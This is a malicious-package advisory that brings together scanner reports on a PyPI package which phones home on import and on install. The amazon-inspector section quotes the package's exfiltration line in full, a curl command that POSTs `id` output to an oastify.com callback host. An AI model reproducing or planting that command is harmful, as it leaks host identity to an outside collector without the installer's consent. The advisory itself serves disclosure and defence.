MAL-2026-6478

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39) On every import, the package's top-level __init__.py runs `os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)")`. This unconditionally executes a shell pipeline that POSTs the output of the `id` command (current uid/gid/group membership) to a Burp Suite Collaborator (oastify.com) subdomain — an out-of-band callback service used to confirm remote code execution and exfiltrate data. The behavior fires on `import mi_test_99` with no user gating, no relation to any advertised functionality, over plaintext HTTP. Package metadata is placeholder-shaped (name contains the literal Spanish placeholder `tuapellido`/'your-surname', author fields are `Tu Nombre <tu@email.com>`, pyproject comment reads `CAMBIA ESTO por un nombre único`), consistent with a dependency-confusion or namespace-squat proof-of-concept payload. Whether intended as a test or a live attack, any installer that imports this package leaks host identity to an attacker-controlled collector and demonstrates an arbitrary-shell-exec channel.

## Source: kam193 (060712d1fb233a9a9be7115401704cd0ab7cb4f3e15dc1f58ad5ef4685d5fe37) Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.

---

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

- The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

- The package overrides the install command in setup.py to execute malicious code during installation.

## Source: ossf-package-analysis (2d2263c69d2201d6f365635468e2e0b55f4bd4140098f9268223b8f6729af033) The OpenSSF Package Analysis project identified 'mi-test-99-tuapellido' @ 99.9 (pypi) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

- The package executes one or more commands associated with malicious behavior.